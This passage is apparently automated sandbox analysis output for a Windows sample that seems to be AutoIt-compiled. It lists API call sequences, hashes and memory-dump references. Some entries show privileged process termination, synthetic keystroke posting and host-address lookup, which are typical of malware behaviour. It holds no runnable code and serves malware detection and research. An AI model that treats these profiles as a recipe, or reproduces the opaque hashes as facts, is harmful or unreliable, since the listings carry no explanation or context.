                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                    • String ID:
                                                    • API String ID: 337547030-0
                                                    • Opcode ID: 663fee1e01746f1e72978d9be9bb7f91d9fd9bb1c8a8a54a0b82eaac475ea6a3
                                                    • Instruction ID: d2bb6f49f64783154e25ede674ec2ec268b7f9edf2ca5f1956c5345fc24446b1
                                                    • Opcode Fuzzy Hash: 663fee1e01746f1e72978d9be9bb7f91d9fd9bb1c8a8a54a0b82eaac475ea6a3
                                                    • Instruction Fuzzy Hash: 5C317871211B05AFDB23AFA1CD45A66BBFCFF09300B14555DF89686A10D731E814DBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 003742CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 003742E6
                                                      • Part of subcall function 003742CC: GetCurrentThreadId.KERNEL32 ref: 003742ED
                                                      • Part of subcall function 003742CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00372E43), ref: 003742F4
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00372E4D
                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00372E6B
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00372E6F
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00372E79
                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00372E91
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00372E95
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00372E9F
                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00372EB3
                                                    • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00372EB7
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                    • String ID:
                                                    • API String ID: 2014098862-0
                                                    • Opcode ID: 92c53b123191fd8ab2fe3917c5dc9b5ba72199db53d1d3021a642c9600388342
                                                    • Instruction ID: d19778187aa5bac5352de870344895d69cb72fa8ea18cea312edc2223c220404
                                                    • Opcode Fuzzy Hash: 92c53b123191fd8ab2fe3917c5dc9b5ba72199db53d1d3021a642c9600388342
                                                    • Instruction Fuzzy Hash: EA01D8313802147BFB2167699C8AF567F5DDB4AB11F105001F319AE1F1C9E22445CAA9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00371CD9,?,?,00000000), ref: 0037209C
                                                    • HeapAlloc.KERNEL32(00000000,?,00371CD9,?,?,00000000), ref: 003720A3
                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00371CD9,?,?,00000000), ref: 003720B8
                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00371CD9,?,?,00000000), ref: 003720C0
                                                    • DuplicateHandle.KERNEL32(00000000,?,00371CD9,?,?,00000000), ref: 003720C3
                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00371CD9,?,?,00000000), ref: 003720D3
                                                    • GetCurrentProcess.KERNEL32(00371CD9,00000000,?,00371CD9,?,?,00000000), ref: 003720DB
                                                    • DuplicateHandle.KERNEL32(00000000,?,00371CD9,?,?,00000000), ref: 003720DE
                                                    • CreateThread.KERNEL32 ref: 003720F8
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                    • String ID:
                                                    • API String ID: 1957940570-0
                                                    • Opcode ID: 798db92c1f13585a5977c5637ce279407c040d00a434b480e51e16dda66b9ba1
                                                    • Instruction ID: a7f174084deb59c4a5c6e0b600c17ed1f11654d36a48796962eef7577af48333
                                                    • Opcode Fuzzy Hash: 798db92c1f13585a5977c5637ce279407c040d00a434b480e51e16dda66b9ba1
                                                    • Instruction Fuzzy Hash: AE01CDB5240308BFE751AFA5DC4DF6B3BACEB8A711F404411FA05DB5A1DA749800CB20
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0037DC9C: CreateToolhelp32Snapshot.KERNEL32 ref: 0037DCC1
                                                      • Part of subcall function 0037DC9C: Process32FirstW.KERNEL32(00000000,?), ref: 0037DCCF
                                                      • Part of subcall function 0037DC9C: CloseHandle.KERNEL32(00000000), ref: 0037DD9C
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0039AACC
                                                    • GetLastError.KERNEL32 ref: 0039AADF
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0039AB12
                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0039ABC7
                                                    • GetLastError.KERNEL32(00000000), ref: 0039ABD2
                                                    • CloseHandle.KERNEL32(00000000), ref: 0039AC23
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                    • String ID: SeDebugPrivilege
                                                    • API String ID: 2533919879-2896544425
                                                    • Opcode ID: 6e3638c47bd0152912aab9ab867d6544efadee27c8da5830f709fe66b30fc729
                                                    • Instruction ID: 09ca8c84b787850e4d316d6387fbcc8028760079e71dbb470921034b8fddb61f
                                                    • Opcode Fuzzy Hash: 6e3638c47bd0152912aab9ab867d6544efadee27c8da5830f709fe66b30fc729
                                                    • Instruction Fuzzy Hash: C361C230208602AFDB26DF18C494F16BBE5AF44318F19858CE4668FBA2C775ED45CBD2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 003A4284
                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 003A4299
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 003A42B3
                                                    • _wcslen.LIBCMT ref: 003A42F8
                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 003A4325
                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 003A4353
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window_wcslen
                                                    • String ID: SysListView32
                                                    • API String ID: 2147712094-78025650
                                                    • Opcode ID: f7a994c644937d7477e0fdd1cada414b6bf4d08516168dbe0eaf316a4fecc237
                                                    • Instruction ID: b11f4cb125ab8032b9e6d21ee43a98ee7a4fdf49a3e558a2182b3ae46e8366ee
                                                    • Opcode Fuzzy Hash: f7a994c644937d7477e0fdd1cada414b6bf4d08516168dbe0eaf316a4fecc237
                                                    • Instruction Fuzzy Hash: 6341BE71A00318ABDF229F64CC49FEA7BA9FF49360F110526F954EB291D7B19990CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0037C5D9
                                                    • IsMenu.USER32 ref: 0037C5F9
                                                    • CreatePopupMenu.USER32(003E2990,00000000,762D33D0), ref: 0037C62F
                                                    • GetMenuItemCount.USER32 ref: 0037C680
                                                    • InsertMenuItemW.USER32(00DD9580,?,00000001,00000030), ref: 0037C6A8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                    • String ID: 0$2
                                                    • API String ID: 93392585-3793063076
                                                    • Opcode ID: a0bfca12ea3b934f064b57ae39d27848da75c0cd6e7686b4311169e93068e084
                                                    • Instruction ID: 4952ce2dafccf889833dd886ab407f78b1be5bc65aee3a6a9a0fd7a2b67af132
                                                    • Opcode Fuzzy Hash: a0bfca12ea3b934f064b57ae39d27848da75c0cd6e7686b4311169e93068e084
                                                    • Instruction Fuzzy Hash: D951B570910305ABDF32CF68C9C4BAEBBF9AF45314F18A11DE419AB291D7789D40CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadIconW.USER32(00000000,00007F03), ref: 0037D0D3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: IconLoad
                                                    • String ID: blank$info$question$stop$warning
                                                    • API String ID: 2457776203-404129466
                                                    • Opcode ID: 6702a4ceaa25a2b988edd4e2f5428711c6fc329c03030d5f9e98dc28a8b5f8e6
                                                    • Instruction ID: ec6519de15ffbabc565164c3cbdb3c9b83d180f780090d87ef392e03089a9108
                                                    • Opcode Fuzzy Hash: 6702a4ceaa25a2b988edd4e2f5428711c6fc329c03030d5f9e98dc28a8b5f8e6
                                                    • Instruction Fuzzy Hash: 03110D3224C306FAE7375B249CC2CEA67FC9F15320F61402BF9087A682EB79AD014164
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                    • String ID: 0.0.0.0
                                                    • API String ID: 642191829-3771769585
                                                    • Opcode ID: 18cd321770d0cbf6c66b7c86b7b7fcb7cf217da1e3f6ff62c023473f0bf7c24f
                                                    • Instruction ID: 0efb9f8bff37a2f883f2d64598b40fdb1d685e7762b2089f8e586c2af088b133
                                                    • Opcode Fuzzy Hash: 18cd321770d0cbf6c66b7c86b7b7fcb7cf217da1e3f6ff62c023473f0bf7c24f
                                                    • Instruction Fuzzy Hash: 7C112631900215AFDB3B6B30DC8AEDE77BCEF45710F1141A5F54A9A092EF789A81DA60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit
                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                    • API String ID: 2610073882-625585964
                                                    • Opcode ID: 77f80a952c8ccdc2890cdcfa4d5154d152bd66ada94daba1887ca5f59621b46d
                                                    • Instruction ID: 9051455a5515e99732cc96680bc3201c21a78686fbb32357007045d8b2be37ed
                                                    • Opcode Fuzzy Hash: 77f80a952c8ccdc2890cdcfa4d5154d152bd66ada94daba1887ca5f59621b46d
                                                    • Instruction Fuzzy Hash: C4919071A00619AFDF26CFA5C884FAEBBB8EF45714F108559F506AB240D7709985CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 003942C8
                                                    • CharUpperBuffW.USER32(?,?), ref: 003943D7
                                                    • _wcslen.LIBCMT ref: 003943E7
                                                    • VariantClear.OLEAUT32(?), ref: 0039457C
                                                      • Part of subcall function 003815B3: VariantInit.OLEAUT32(00000000), ref: 003815F3
                                                      • Part of subcall function 003815B3: VariantCopy.OLEAUT32(?,?), ref: 003815FC
                                                      • Part of subcall function 003815B3: VariantClear.OLEAUT32(?), ref: 00381608
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                    • API String ID: 4137639002-1221869570
                                                    • Opcode ID: 0151fe0fbfb7eaae7b036e976191c921a27d6354e03be6c326e9d8573f2dbf9c
                                                    • Instruction ID: 7f9323cd695ddbc820f07bbd514a7760b07ee240180b7b1e1876c178bd04ebb8
                                                    • Opcode Fuzzy Hash: 0151fe0fbfb7eaae7b036e976191c921a27d6354e03be6c326e9d8573f2dbf9c
                                                    • Instruction Fuzzy Hash: 86918C756083019FCB05EF68C48196AB7E9FF89314F14892DF88A9B351DB30ED46CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetMenu.USER32(?), ref: 003A2AE2
                                                    • GetMenuItemCount.USER32 ref: 003A2B14
                                                    • GetMenuStringW.USER32 ref: 003A2B3C
                                                    • _wcslen.LIBCMT ref: 003A2B72
                                                    • GetMenuItemID.USER32(?,?), ref: 003A2BAC
                                                    • GetSubMenu.USER32 ref: 003A2BBA
                                                      • Part of subcall function 003742CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 003742E6
                                                      • Part of subcall function 003742CC: GetCurrentThreadId.KERNEL32 ref: 003742ED
                                                      • Part of subcall function 003742CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00372E43), ref: 003742F4
                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003A2C42
                                                      • Part of subcall function 0037F1A7: Sleep.KERNEL32 ref: 0037F21F
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                    • String ID:
                                                    • API String ID: 4196846111-0
                                                    • Opcode ID: 4f99f90f34ba038c481ac746c7140fb27c7a53e2e99c91c1e81989e21eadef63
                                                    • Instruction ID: 891e73f35c17ab6e266d7e311133efd135963aa0c107265d533aa37a37009b50
                                                    • Opcode Fuzzy Hash: 4f99f90f34ba038c481ac746c7140fb27c7a53e2e99c91c1e81989e21eadef63
                                                    • Instruction Fuzzy Hash: 6271A475A00205AFCB16DF68C885AAEB7F5FF49320F158459E816EB351DB34ED41CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • IsWindow.USER32(00000000), ref: 003A8896
                                                    • IsWindowEnabled.USER32(00000000), ref: 003A88A2
                                                    • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 003A897D
                                                    • SendMessageW.USER32(00000000,000000B0,?,?), ref: 003A89B0
                                                    • IsDlgButtonChecked.USER32(?,00000000), ref: 003A89E8
                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 003A8A0A
                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 003A8A22
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                    • String ID:
                                                    • API String ID: 4072528602-0
                                                    • Opcode ID: 78808731554b34e5d89362232ed3f5c0d4a0a8de471e0aa07ff27b069e292ffd
                                                    • Instruction ID: c5e626604a1990e5be3e7b60207eef5280795ab361769a7cbfbc27112675d242
                                                    • Opcode Fuzzy Hash: 78808731554b34e5d89362232ed3f5c0d4a0a8de471e0aa07ff27b069e292ffd
                                                    • Instruction Fuzzy Hash: 1B71AA34A04244AFEF2B9F54C894FBABBB9EF1B300F154459F896972A1CF35A950CB11
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003780D1
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003780F7
                                                    • SysAllocString.OLEAUT32(00000000), ref: 003780FA
                                                    • SysAllocString.OLEAUT32 ref: 0037811B
                                                    • SysFreeString.OLEAUT32 ref: 00378124
                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 0037813E
                                                    • SysAllocString.OLEAUT32(?), ref: 0037814C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                    • String ID:
                                                    • API String ID: 3761583154-0
                                                    • Opcode ID: 4d928494438289afc62f760254a8ccb48669b6b353efb05a93a5160230ff384b
                                                    • Instruction ID: e4c5bfd6bd020921d4f5e7df2eb41f05f014d784d790e4cb0d9ce5c50e85b9db
                                                    • Opcode Fuzzy Hash: 4d928494438289afc62f760254a8ccb48669b6b353efb05a93a5160230ff384b
                                                    • Instruction Fuzzy Hash: 22218675600204BFDB219FA9DC88CAA77ECEB49360B51C125F909CB2A0DA78EC45CB64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00380DAE
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00380DEA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: CreateHandlePipe
                                                    • String ID: nul
                                                    • API String ID: 1424370930-2873401336
                                                    • Opcode ID: 70805679175ef4eca232c93f67bbe4f6f14c72a75c9172642d4c3b045c761d4e
                                                    • Instruction ID: 9ebb6b3b6ddd4f591d5d77e87e4615e550319d97244067fe5d8e2eee3fe8bca4
                                                    • Opcode Fuzzy Hash: 70805679175ef4eca232c93f67bbe4f6f14c72a75c9172642d4c3b045c761d4e
                                                    • Instruction Fuzzy Hash: 7C218D70500305EFDB66AF69DC04B9ABBA8FF41720F204E59F9A1D72E0D770A848CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00380E82
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00380EBD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: CreateHandlePipe
                                                    • String ID: nul
                                                    • API String ID: 1424370930-2873401336
                                                    • Opcode ID: c97f01890a1cac193334fed3853d376b2c68272988984477d7d01ea5a04fdebc
                                                    • Instruction ID: dd819eb5ba2dfb1ca86222cefddfdad22ef01e4a943f5350a5fd3dab7dd3ebe8
                                                    • Opcode Fuzzy Hash: c97f01890a1cac193334fed3853d376b2c68272988984477d7d01ea5a04fdebc
                                                    • Instruction Fuzzy Hash: 6B219071500305ABDB76AF38DC04A9AB7E8EF55724F204B59FEA1E72E0D7709848CB10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0031771B: CreateWindowExW.USER32 ref: 00317759
                                                      • Part of subcall function 0031771B: GetStockObject.GDI32(00000011), ref: 0031776D
                                                      • Part of subcall function 0031771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00317777
                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 003A4A71
                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 003A4A7E
                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 003A4A89
                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 003A4A98
                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 003A4AA4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                    • String ID: Msctls_Progress32
